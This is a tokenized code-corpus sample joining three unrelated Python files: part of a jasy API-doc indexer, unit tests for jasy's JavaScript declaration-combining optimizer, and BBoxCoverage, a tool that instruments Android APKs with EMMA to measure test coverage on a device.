__isIncluded ( packageName , classFilter ) : <EOL> Console . debug ( "<STR_LIT>" , packageName ) <EOL> apiData [ packageName ] = docs [ packageName ] . getApi ( ) <EOL> for className in sorted ( apiData ) : <EOL> splits = className . split ( "<STR_LIT:.>" ) <EOL> packageName = splits [ <NUM_LIT:0> ] <EOL> for split in splits [ <NUM_LIT:1> : ] : <EOL> if not packageName in apiData : <EOL> Console . warn ( "<STR_LIT>" , packageName ) <EOL> apiData [ packageName ] = Data . ApiData ( packageName , highlight = highlightCode ) <EOL> apiData [ packageName ] . main = { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : packageName <EOL> } <EOL> packageName = "<STR_LIT>" % ( packageName , split ) <EOL> for className in sorted ( apiData ) : <EOL> splits = className . split ( "<STR_LIT:.>" ) <EOL> packageName = "<STR_LIT:.>" . join ( splits [ : - <NUM_LIT:1> ] ) <EOL> if packageName : <EOL> package = apiData [ packageName ] <EOL> entry = { <EOL> "<STR_LIT:name>" : splits [ - <NUM_LIT:1> ] , <EOL> "<STR_LIT>" : className , <EOL> } <EOL> classMain = apiData [ className ] . main <EOL> if "<STR_LIT>" in classMain and classMain [ "<STR_LIT>" ] : <EOL> summary = Text . extractSummary ( classMain [ "<STR_LIT>" ] ) <EOL> if summary : <EOL> entry [ "<STR_LIT>" ] = summary <EOL> if "<STR_LIT:type>" in classMain and classMain [ "<STR_LIT:type>" ] : <EOL> entry [ "<STR_LIT:type>" ] = classMain [ "<STR_LIT:type>" ] <EOL> if not hasattr ( package , "<STR_LIT:content>" ) : <EOL> package . content = [ entry ] <EOL> else : <EOL> package . content . append ( entry ) <EOL> Console . outdent ( ) <EOL> Console . debug ( "<STR_LIT>" ) <EOL> index = { } <EOL> for className in sorted ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> mainInfo = classApi . main <EOL> current = index <EOL> for split in className . 
split ( "<STR_LIT:.>" ) : <EOL> if not split in current : <EOL> current [ split ] = { } <EOL> current = current [ split ] <EOL> current [ "<STR_LIT>" ] = mainInfo [ "<STR_LIT:type>" ] <EOL> if hasattr ( classApi , "<STR_LIT:content>" ) : <EOL> current [ "<STR_LIT>" ] = True <EOL> return apiData , index , search </s>
import sys, os, unittest, logging

if __name__ == "__main__":
    # When executed directly, make the jasy package importable by walking
    # four directory levels up from this script to the repository root.
    jasyroot = os.path.normpath(
        os.path.join(os.path.abspath(sys.argv[0]),
                     os.pardir, os.pardir, os.pardir, os.pardir))
    sys.path.insert(0, jasyroot)
    print("<STR_LIT>" % jasyroot)

import jasy.js.parse.Parser as Parser
import jasy.js.parse.ScopeScanner as ScopeScanner
import jasy.js.output.Compressor as Compressor
import jasy.js.optimize.CombineDeclarations as CombineDeclarations


class Tests(unittest.TestCase):
    """Unit tests for the CombineDeclarations JS optimizer."""

    def process(self, code):
        """Parse *code*, combine its declarations, and return the compressed JS."""
        tree = Parser.parse(code)
        ScopeScanner.scan(tree)
        CombineDeclarations.optimize(tree)
        return Compressor.Compressor().compress(tree)

    def test_combine_basic(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_closure_innerfirst(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_closure(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_complex(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_destruct_assign(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_destruct(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_doubles(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_doubles_break(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_doubles_for(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')

    def test_combine_doubles_oneassign(self):
        result = self.process('''<STR_LIT>''')
        self.assertEqual(result, '<STR_LIT>')


if __name__ == '__main__':
    logging.getLogger().setLevel(logging.ERROR)
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(unittest.TestLoader().loadTestsFromTestCase(Tests))
<s> '''<STR_LIT>''' <EOL> import os , sys , shutil <EOL> import ConfigParser <EOL> from bbox_core . bbox_config import BBoxConfig <EOL> from utils . state_machine import StateMachine <EOL> from utils import apk_utils , auxiliary_utils , zip_utils <EOL> from bbox_core . bboxreporter import MsgException , BBoxReporter <EOL> from bbox_core . bboxinstrumenter import BBoxInstrumenter , ApkCannotBeDecompiledException , Dex2JarConvertionError , EmmaCannotInstrumentException , Jar2DexConvertionError , IllegalArgumentException , ApktoolBuildException , SignApkException , AlignApkException <EOL> from bbox_core . bboxexecutor import BBoxExecutor , ApkCannotBeInstalledException <EOL> from logconfig import logger <EOL> from string import rfind <EOL> from utils . android_manifest import AndroidManifest <EOL> from time import localtime <EOL> import datetime <EOL> from interfaces . emma_interface import EMMA_REPORT <EOL> import time <EOL> from six import iteritems <EOL> RESULTS_RELATIVE_DIR = "<STR_LIT>" <EOL> TMP_RELATIVE_DIR = "<STR_LIT>" <EOL> DEVICE_REPORT_FOLDER_PATH = "<STR_LIT>" <EOL> PARAMS_SECTION = "<STR_LIT>" <EOL> STATE_UNINITIALIZED = "<STR_LIT>" <EOL> STATE_APK_VALID = "<STR_LIT>" <EOL> STATE_FOLDERS_CREATED = "<STR_LIT>" <EOL> STATE_APK_DECOMPILED = "<STR_LIT>" <EOL> STATE_DEX_CONVERTED_TO_JAR = "<STR_LIT>" <EOL> STATE_JARS_INSTRUMENTED = "<STR_LIT>" <EOL> STATE_JAR_CONVERTED_TO_DEX = "<STR_LIT>" <EOL> STATE_MANIFEST_INSTRUMENTED = "<STR_LIT>" <EOL> STATE_INSTRUMENTED_APK_BUILD = "<STR_LIT>" <EOL> STATE_FINAL_INSTRUMENTED_APK_BUILD = "<STR_LIT>" <EOL> STATE_INSTRUMENTED_APK_SIGNED = "<STR_LIT>" <EOL> STATE_INSTRUMENTED_APK_ALIGNED = "<STR_LIT>" <EOL> STATE_APK_INSTRUMENTED = "<STR_LIT>" <EOL> STATE_VALID_SETTINGS_PROVIDED = "<STR_LIT>" <EOL> STATE_APK_INSTALLED = "<STR_LIT>" <EOL> STATE_APK_TEST_STARTED = "<STR_LIT>" <EOL> STATE_APK_FINISHED_TESTING = "<STR_LIT>" <EOL> STATES = [ ( STATE_UNINITIALIZED , STATE_APK_VALID ) , <EOL> ( STATE_APK_VALID , 
STATE_FOLDERS_CREATED ) , <EOL> ( STATE_FOLDERS_CREATED , STATE_APK_DECOMPILED ) , <EOL> ( STATE_APK_DECOMPILED , STATE_DEX_CONVERTED_TO_JAR ) , <EOL> ( STATE_DEX_CONVERTED_TO_JAR , STATE_JARS_INSTRUMENTED ) , <EOL> ( STATE_JARS_INSTRUMENTED , STATE_JAR_CONVERTED_TO_DEX ) , <EOL> ( STATE_JAR_CONVERTED_TO_DEX , STATE_MANIFEST_INSTRUMENTED ) , <EOL> ( STATE_MANIFEST_INSTRUMENTED , STATE_INSTRUMENTED_APK_BUILD ) , <EOL> ( STATE_INSTRUMENTED_APK_BUILD , STATE_FINAL_INSTRUMENTED_APK_BUILD ) , <EOL> ( STATE_FINAL_INSTRUMENTED_APK_BUILD , STATE_INSTRUMENTED_APK_SIGNED ) , <EOL> ( STATE_INSTRUMENTED_APK_SIGNED , STATE_INSTRUMENTED_APK_ALIGNED ) , <EOL> ( STATE_INSTRUMENTED_APK_ALIGNED , STATE_APK_INSTRUMENTED ) , <EOL> ( STATE_APK_INSTRUMENTED , STATE_APK_INSTALLED ) , <EOL> ( STATE_VALID_SETTINGS_PROVIDED , STATE_APK_INSTALLED ) , <EOL> ( STATE_APK_INSTRUMENTED , STATE_APK_TEST_STARTED ) , <EOL> ( STATE_VALID_SETTINGS_PROVIDED , STATE_APK_TEST_STARTED ) , <EOL> ( STATE_APK_INSTALLED , STATE_APK_TEST_STARTED ) , <EOL> ( STATE_APK_TEST_STARTED , STATE_APK_FINISHED_TESTING ) , <EOL> ] <EOL> class BBoxCoverage : <EOL> PREFIX_ONSTOP = "<STR_LIT>" ; <EOL> PREFIX_ONERROR = "<STR_LIT>" ; <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , pathToBBoxConfigFile = "<STR_LIT>" ) : <EOL> self . androidManifestFile = None <EOL> self . instrumentedApk = None <EOL> self . config = BBoxConfig ( pathToBBoxConfigFile ) <EOL> self . bboxInstrumenter = BBoxInstrumenter ( self . config ) <EOL> self . bboxExecutor = BBoxExecutor ( self . config ) <EOL> self . bboxReporter = BBoxReporter ( self . config ) <EOL> self . _bboxStateMachine = StateMachine ( states = STATES ) <EOL> def getInstrumentedApk ( self ) : <EOL> return self . instrumentedApk <EOL> def getPackageName ( self ) : <EOL> return self . 
packageName <EOL> def instrumentApkForCoverage ( self , pathToOrigApk , resultsDir = None , tmpDir = None , <EOL> removeApkTmpDirAfterInstr = True , <EOL> copyApkToRes = True ) : <EOL> '''<STR_LIT>''' <EOL> self . _bboxStateMachine . start ( STATE_UNINITIALIZED ) <EOL> valid = self . _checkProvidedApk ( pathToOrigApk ) <EOL> if not valid : <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_VALID ) <EOL> resultsRootDir = None <EOL> if not resultsDir : <EOL> resultsRootDir = os . path . join ( os . getcwd ( ) , RESULTS_RELATIVE_DIR ) <EOL> else : <EOL> resultsRootDir = os . path . abspath ( resultsDir ) <EOL> tmpRootDir = None <EOL> if not tmpDir : <EOL> tmpRootDir = os . path . join ( os . getcwd ( ) , TMP_RELATIVE_DIR ) <EOL> else : <EOL> tmpRootDir = os . path . abspath ( tmpDir ) <EOL> apkFileName = os . path . splitext ( os . path . basename ( pathToOrigApk ) ) [ <NUM_LIT:0> ] <EOL> self . apkTmpDir = self . _createDir ( tmpDir , apkFileName , False , True ) <EOL> self . apkResultsDir = self . _createDir ( resultsRootDir , apkFileName , False , True ) <EOL> self . coverageMetadataFolder = self . _createDir ( self . apkResultsDir , self . config . getCoverageMetadataRelativeDir ( ) , False , True ) <EOL> self . runtimeReportsRootDir = self . _createDir ( self . apkResultsDir , self . config . getRuntimeReportsRelativeDir ( ) , False , True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_FOLDERS_CREATED ) <EOL> if copyApkToRes : <EOL> shutil . copy2 ( pathToOrigApk , self . apkResultsDir ) <EOL> decompileDir = os . path . join ( self . apkTmpDir , self . config . getDecompiledApkRelativeDir ( ) ) <EOL> success = self . _decompileApk ( self . bboxInstrumenter , pathToOrigApk , decompileDir ) <EOL> if not success : <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_DECOMPILED ) <EOL> dexFilesRelativePaths = self . 
_getDexFilePathsRelativeToDir ( decompileDir ) <EOL> if not dexFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> if "<STR_LIT>" not in dexFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> rawJarFilesRootDir = os . path . join ( self . apkTmpDir , self . config . getTmpJarRelativeDir ( ) ) <EOL> jarFilesRelativePaths = self . _convertDex2JarFiles ( <EOL> converter = self . bboxInstrumenter , <EOL> dexFilesRootDir = decompileDir , <EOL> dexFilesRelativePaths = dexFilesRelativePaths , <EOL> jarFilesRootDir = rawJarFilesRootDir , <EOL> proceedOnError = True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_DEX_CONVERTED_TO_JAR ) <EOL> if "<STR_LIT>" not in jarFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . coverageMetadataFile = os . path . join ( self . coverageMetadataFolder , self . config . getCoverageMetadataFilename ( ) ) <EOL> emmaInstrJarFilesRootDir = os . path . join ( self . apkTmpDir , self . config . getInstrumentedFilesRelativeDir ( ) ) <EOL> emmaInstrJarFileRelativePaths = self . _instrFilesWithEmma ( <EOL> instrumenter = self . bboxInstrumenter , <EOL> jarFilesRootDir = rawJarFilesRootDir , <EOL> jarFilesRelativePaths = jarFilesRelativePaths , <EOL> instrJarsRootDir = emmaInstrJarFilesRootDir , <EOL> coverageMetadataFile = self . coverageMetadataFile , <EOL> proceedOnError = True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_JARS_INSTRUMENTED ) <EOL> if "<STR_LIT>" not in emmaInstrJarFileRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> instrDexFilesRelativePaths = self . _convertJar2DexWithInstr ( <EOL> converter = self . bboxInstrumenter , <EOL> instrJarsRootDir = emmaInstrJarFilesRootDir , <EOL> instrJarFilesRelativePaths = emmaInstrJarFileRelativePaths , <EOL> finalDexFilesRootDir = decompileDir , <EOL> proceedOnError = True ) <EOL> self . _bboxStateMachine . 
transitToState ( STATE_JAR_CONVERTED_TO_DEX ) <EOL> if "<STR_LIT>" not in instrDexFilesRelativePaths : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> uninstrumentedFiles = self . _getUnInstrFilesRelativePaths ( dexFilesRelativePaths , instrDexFilesRelativePaths ) <EOL> if uninstrumentedFiles : <EOL> logger . debug ( "<STR_LIT>" + str ( uninstrumentedFiles ) ) <EOL> decompiledAndroidManifestPath = os . path . join ( decompileDir , "<STR_LIT>" ) <EOL> success = self . _instrAndroidManifest ( self . bboxInstrumenter , decompiledAndroidManifestPath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> shutil . copy2 ( decompiledAndroidManifestPath , self . apkResultsDir ) <EOL> self . androidManifestFile = os . path . join ( self . apkResultsDir , "<STR_LIT>" ) <EOL> self . _bboxStateMachine . transitToState ( STATE_MANIFEST_INSTRUMENTED ) <EOL> compiledApkFilePath = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getInstrFileSuffix ( ) ) ) <EOL> success = self . _compileApk ( self . bboxInstrumenter , decompileDir , compiledApkFilePath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_INSTRUMENTED_APK_BUILD ) <EOL> compiledApkFilePathWithEmmaRes = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getFinalInstrFileSuffix ( ) ) ) <EOL> shutil . copy2 ( compiledApkFilePath , compiledApkFilePathWithEmmaRes ) <EOL> self . _putAdditionalResources ( apk = compiledApkFilePathWithEmmaRes , resources = self . config . getEmmaResourcesDir ( ) ) <EOL> self . _bboxStateMachine . transitToState ( STATE_FINAL_INSTRUMENTED_APK_BUILD ) <EOL> signedApkFilePath = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getSignedFileSuffix ( ) ) ) <EOL> success = self . _signApk ( self . 
bboxInstrumenter , compiledApkFilePathWithEmmaRes , signedApkFilePath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_INSTRUMENTED_APK_SIGNED ) <EOL> alignedApkFilePath = os . path . join ( self . apkResultsDir , "<STR_LIT>" % ( apkFileName , self . config . getAlignedFileSuffix ( ) ) ) <EOL> success = self . _alignApk ( self . bboxInstrumenter , signedApkFilePath , alignedApkFilePath ) <EOL> if not success : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> self . _bboxStateMachine . transitToState ( STATE_INSTRUMENTED_APK_ALIGNED ) <EOL> if removeApkTmpDirAfterInstr : <EOL> shutil . rmtree ( self . apkTmpDir ) <EOL> self . instrumentedApk = alignedApkFilePath <EOL> self . androidManifest = AndroidManifest ( self . androidManifestFile ) <EOL> self . packageName = self . androidManifest . getInstrumentationTargetPackage ( ) <EOL> self . runnerName = self . androidManifest . getInstrumentationRunnerName ( ) <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_INSTRUMENTED ) <EOL> return True <EOL> def _createDir ( self , root , directory , createNew = True , overwrite = False ) : <EOL> resDir = os . path . join ( root , directory ) <EOL> if createNew : <EOL> i = <NUM_LIT:0> <EOL> while os . path . exists ( resDir ) : <EOL> i += <NUM_LIT:1> <EOL> resDir = os . path . join ( root , "<STR_LIT>" % ( directory , i ) ) <EOL> auxiliary_utils . mkdir ( path = resDir , mode = <NUM_LIT:0> <NUM_LIT> , overwrite = overwrite ) <EOL> return resDir <EOL> def _createFolder ( self , root , dirName , overwrite = False ) : <EOL> resultDir = os . path . join ( root , dirName ) <EOL> auxiliary_utils . mkdir ( path = resultDir , mode = <NUM_LIT:0> <NUM_LIT> , overwrite = overwrite ) <EOL> return resultDir <EOL> def _checkProvidedApk ( self , pathToApk ) : <EOL> '''<STR_LIT>''' <EOL> ( valid , error ) = apk_utils . checkInputApkFile ( pathToApk ) <EOL> if not valid : <EOL> logger . 
error ( "<STR_LIT>" % ( pathToApk , error ) ) <EOL> return valid <EOL> return valid <EOL> def _decompileApk ( self , decompiler , apk , outputDir ) : <EOL> try : <EOL> decompiler . decompileApk ( apk , outputDir ) <EOL> except ApkCannotBeDecompiledException as e : <EOL> logger . error ( e . msg ) <EOL> return False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> return True <EOL> def _convertDex2JarFiles ( self , converter , dexFilesRootDir , dexFilesRelativePaths , jarFilesRootDir , proceedOnError = True ) : <EOL> jarFilesRelativePaths = [ ] <EOL> for dexFileRelativePath in dexFilesRelativePaths : <EOL> dexFilePath = os . path . join ( dexFilesRootDir , dexFileRelativePath ) <EOL> jarFileRelativePath = os . path . splitext ( dexFileRelativePath ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> jarFilePath = os . path . join ( jarFilesRootDir , jarFileRelativePath ) <EOL> try : <EOL> converter . convertDex2Jar ( dexFilePath , jarFilePath , overwrite = True ) <EOL> except Dex2JarConvertionError as e : <EOL> if proceedOnError : <EOL> logger . warning ( "<STR_LIT>" ( dexFilePath , jarFilePath , e . msg ) ) <EOL> continue <EOL> else : <EOL> raise <EOL> jarFilesRelativePaths . append ( jarFileRelativePath ) <EOL> return jarFilesRelativePaths <EOL> def _instrFilesWithEmma ( self , instrumenter , jarFilesRootDir , jarFilesRelativePaths , <EOL> instrJarsRootDir , coverageMetadataFile , proceedOnError = True ) : <EOL> instrJarFilesRelativePaths = [ ] <EOL> for jarFileRelativePath in jarFilesRelativePaths : <EOL> jarFileAbsPath = os . path . join ( jarFilesRootDir , jarFileRelativePath ) <EOL> instrJarRelativeDir = jarFileRelativePath [ : jarFileRelativePath . rfind ( "<STR_LIT:/>" ) + <NUM_LIT:1> ] <EOL> instrJarFullDir = os . path . join ( instrJarsRootDir , instrJarRelativeDir ) <EOL> try : <EOL> instrumenter . 
instrumentJarWithEmma ( jarFile = jarFileAbsPath , outputFolder = instrJarFullDir , emmaMetadataFile = coverageMetadataFile ) <EOL> except EmmaCannotInstrumentException as e : <EOL> if proceedOnError : <EOL> logger . warning ( "<STR_LIT>" ( jarFileAbsPath , e . msg ) ) <EOL> continue <EOL> else : <EOL> raise <EOL> instrJarFilesRelativePaths . append ( jarFileRelativePath ) <EOL> return instrJarFilesRelativePaths <EOL> def _convertJar2DexWithInstr ( self , converter , instrJarsRootDir , <EOL> instrJarFilesRelativePaths , <EOL> finalDexFilesRootDir , proceedOnError ) : <EOL> instrDexFilesRelativePaths = [ ] <EOL> for jarFileRelativePath in instrJarFilesRelativePaths : <EOL> jarFileAbsPath = os . path . join ( instrJarsRootDir , jarFileRelativePath ) <EOL> dexFileRelativePath = os . path . splitext ( jarFileRelativePath ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> dexFileAbsPath = os . path . join ( finalDexFilesRootDir , dexFileRelativePath ) <EOL> print "<STR_LIT>" + jarFileRelativePath <EOL> try : <EOL> withFiles = [ ] <EOL> if jarFileRelativePath == "<STR_LIT>" : <EOL> emmaDevicePath = os . path . join ( self . config . getEmmaDir ( ) , self . config . getEmmaDeviceJar ( ) ) <EOL> withFiles . append ( self . config . getAndroidSpecificInstrumentationClassesPath ( ) ) <EOL> withFiles . append ( emmaDevicePath ) <EOL> converter . convertJar2Dex ( jarFile = jarFileAbsPath , <EOL> dexFile = dexFileAbsPath , <EOL> withFiles = withFiles , <EOL> overwrite = True ) <EOL> except Jar2DexConvertionError as e : <EOL> if proceedOnError : <EOL> logger . warning ( "<STR_LIT>" % ( jarFileAbsPath , e . msg ) ) <EOL> continue <EOL> else : <EOL> raise <EOL> instrDexFilesRelativePaths . 
append ( dexFileRelativePath ) <EOL> return instrDexFilesRelativePaths <EOL> def _getUnInstrFilesRelativePaths ( self , dexFilesRelativePaths , instrDexFilesRelativePaths ) : <EOL> uninstrumentedFiles = [ ] <EOL> for dexFileRelativePath in dexFilesRelativePaths : <EOL> if dexFileRelativePath not in instrDexFilesRelativePaths : <EOL> uninstrumentedFiles . append ( dexFileRelativePath ) <EOL> return uninstrumentedFiles <EOL> def _instrAndroidManifest ( self , instrumenter , initAndroidManifest , instrAndroidManifest = None , addSdCardPermission = True ) : <EOL> success = True <EOL> try : <EOL> instrumenter . instrumentAndroidManifestFile ( initAndroidManifest , instrAndroidManifest , addSdCardPermission ) <EOL> except IllegalArgumentException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _compileApk ( self , compiler , fromDir , apkPath ) : <EOL> success = True <EOL> try : <EOL> compiler . buildApk ( fromDir , apkPath ) <EOL> except ApktoolBuildException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _putAdditionalResources ( self , apk , resources ) : <EOL> zip_utils . zipdir ( resources , apk ) <EOL> def _signApk ( self , signer , unsignedApkFile , signedApkFile ) : <EOL> success = True <EOL> try : <EOL> signer . signApk ( unsignedApkFile , signedApkFile ) <EOL> except SignApkException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _alignApk ( self , aligner , unalignedApkFile , alignedApkFile ) : <EOL> success = True <EOL> try : <EOL> aligner . alignApk ( unalignedApkFile , alignedApkFile ) <EOL> except AlignApkException as e : <EOL> logger . error ( "<STR_LIT>" % e . 
msg ) <EOL> success = False <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> success = False <EOL> return success <EOL> def _getDexFiles ( self , directory ) : <EOL> dexFileNames = auxiliary_utils . searchFiles ( where = directory , extension = "<STR_LIT>" ) <EOL> return dexFileNames <EOL> def _getDexFilePathsRelativeToDir ( self , target ) : <EOL> dexFileRelativePaths = auxiliary_utils . searchFilesRelativeToDir ( target = target , extension = "<STR_LIT>" ) <EOL> return dexFileRelativePaths <EOL> def initAlreadyInstrApkEnv ( self , pathToInstrApk , resultsDir , pathToInstrManifestFile = None ) : <EOL> if not apk_utils . checkInputApkFile ( pathToInstrApk ) : <EOL> logger . error ( "<STR_LIT>" % pathToInstrApk ) <EOL> return <EOL> if not os . path . isdir ( resultsDir ) : <EOL> logger . error ( "<STR_LIT>" % resultsDir ) <EOL> return <EOL> coverageMetadataFolderPath = os . path . join ( resultsDir , self . config . getCoverageMetadataRelativeDir ( ) ) <EOL> if not os . path . isdir ( coverageMetadataFolderPath ) : <EOL> logger . error ( "<STR_LIT>" % resultsDir ) <EOL> return <EOL> self . coverageMetadataFolder = coverageMetadataFolderPath <EOL> if self . config . getCoverageMetadataFilename ( ) not in os . listdir ( coverageMetadataFolderPath ) : <EOL> logger . error ( "<STR_LIT>" % self . coverageMetadataFolder ) <EOL> return <EOL> self . coverageMetadataFile = os . path . join ( self . coverageMetadataFolder , self . config . getCoverageMetadataFilename ( ) ) <EOL> if pathToInstrManifestFile : <EOL> androidManifestPath = pathToInstrManifestFile <EOL> else : <EOL> androidManifestPath = os . path . join ( resultsDir , "<STR_LIT>" ) <EOL> if not os . path . isfile ( androidManifestPath ) : <EOL> logger . warning ( "<STR_LIT>" % androidManifestPath ) <EOL> return <EOL> self . instrumentedApk = pathToInstrApk <EOL> self . apkResultsDir = resultsDir <EOL> self . runtimeReportsRootDir = self . _createDir ( resultsDir , self . config . 
getRuntimeReportsRelativeDir ( ) , False , False ) <EOL> self . androidManifestFile = androidManifestPath <EOL> self . androidManifest = AndroidManifest ( self . androidManifestFile ) <EOL> self . packageName = self . androidManifest . getInstrumentationTargetPackage ( ) <EOL> self . runnerName = self . androidManifest . getInstrumentationRunnerName ( ) <EOL> self . _bboxStateMachine . start ( STATE_VALID_SETTINGS_PROVIDED ) <EOL> def installApkOnDevice ( self ) : <EOL> if not self . _bboxStateMachine . isTransitionPossible ( STATE_APK_INSTALLED ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> self . bboxExecutor . selectExecutionDevice ( ) <EOL> try : <EOL> self . bboxExecutor . installApkOnDevice ( self . instrumentedApk ) <EOL> except ApkCannotBeInstalledException as e : <EOL> logger . error ( "<STR_LIT>" % e . msg ) <EOL> return <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_INSTALLED ) <EOL> def startTesting ( self ) : <EOL> if not self . _bboxStateMachine . isTransitionPossible ( STATE_APK_TEST_STARTED ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> self . deviceReportFolder = os . path . join ( DEVICE_REPORT_FOLDER_PATH , self . packageName ) <EOL> self . bboxExecutor . selectExecutionDevice ( ) <EOL> self . bboxExecutor . startOndeviceTesting ( packageName = self . packageName , <EOL> runnerName = self . runnerName , <EOL> coverage = True , <EOL> reportFolder = self . deviceReportFolder , <EOL> proceedOnError = True , <EOL> generateCoverageReportOnError = True ) <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_TEST_STARTED ) <EOL> def stopTesting ( self , localReportFolderName = None , paramsToWrite = None ) : <EOL> if not self . _bboxStateMachine . isTransitionPossible ( STATE_APK_FINISHED_TESTING ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> if not localReportFolderName : <EOL> localReportFolderName = "<STR_LIT:test>" <EOL> localReportFolder = self . _createDir ( self . 
runtimeReportsRootDir , localReportFolderName , True , False ) <EOL> self . bboxExecutor . stopOndeviceTesting ( cancelAnalysis = False ) <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> success = self . bboxExecutor . getFileFromDevice ( self . deviceReportFolder , localReportFolder ) <EOL> if not success : <EOL> self . bboxExecutor . removeFile ( self . deviceReportFolder ) <EOL> return None <EOL> if paramsToWrite : <EOL> params_config = ConfigParser . ConfigParser ( ) <EOL> params_config . add_section ( PARAMS_SECTION ) <EOL> for param in iteritems ( paramsToWrite ) : <EOL> params_config . set ( PARAMS_SECTION , param [ <NUM_LIT:0> ] , param [ <NUM_LIT:1> ] ) <EOL> with open ( os . path . join ( localReportFolder , "<STR_LIT>" ) , "<STR_LIT:w>" ) as param_file : <EOL> params_config . write ( param_file ) <EOL> self . bboxExecutor . removeFile ( self . deviceReportFolder ) <EOL> self . _bboxStateMachine . transitToState ( STATE_APK_FINISHED_TESTING ) <EOL> return localReportFolder <EOL> def generateReport ( self , reportFiles = [ ] , reportName = None , reportType = EMMA_REPORT . XML ) : <EOL> if not reportFiles : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return <EOL> self . bboxReporter . cleanMetaFiles ( ) <EOL> self . bboxReporter . cleanReportFiles ( ) <EOL> self . bboxReporter . addMetaFile ( self . coverageMetadataFile ) <EOL> for rFile in reportFiles : <EOL> self . bboxReporter . addReportFile ( rFile ) <EOL> reportsRoot = os . path . join ( self . apkResultsDir , self . config . getReportsRelativeDir ( ) ) <EOL> where = self . _createReportResultsDir ( reportsRoot , "<STR_LIT>" % reportType ) <EOL> self . bboxReporter . generateEmmaReport ( where , reportName , reportType ) <EOL> def _createReportResultsDir ( self , reportsRoot , reportDirName ) : <EOL> i = <NUM_LIT:0> <EOL> resultsDir = os . path . join ( reportsRoot , reportDirName ) <EOL> while os . path . exists ( resultsDir ) : <EOL> i += <NUM_LIT:1> <EOL> resultsDir = os . path . 
join ( reportsRoot , "<STR_LIT>" % ( reportDirName , i ) ) <EOL> auxiliary_utils . mkdir ( path = resultsDir , mode = <NUM_LIT:0> <NUM_LIT> , overwrite = False ) <EOL> return resultsDir <EOL> def uninstallPackage ( self ) : <EOL> self . bboxExecutor . uninstallPackage ( packageName = self . packageName , keepData = False ) <EOL> self . _bboxStateMachine . stop ( ) <EOL> @ staticmethod <EOL> def getCoverageReportsFromFolderWithPrefix ( folder , prefix ) : <EOL> if not os . path . exists ( folder ) : <EOL> return None <EOL> reports = [ ] <EOL> for file in os . listdir ( folder ) : <EOL> if file . endswith ( "<STR_LIT>" ) and file . startswith ( prefix ) : <EOL> reports . append ( os . path . join ( folder , file ) ) <EOL> return reports <EOL> class ApkIsNotValidException ( MsgException ) : <EOL> '''<STR_LIT>''' <EOL> class IncorrectStateSequenceException ( MsgException ) : <EOL> '''<STR_LIT>''' </s>
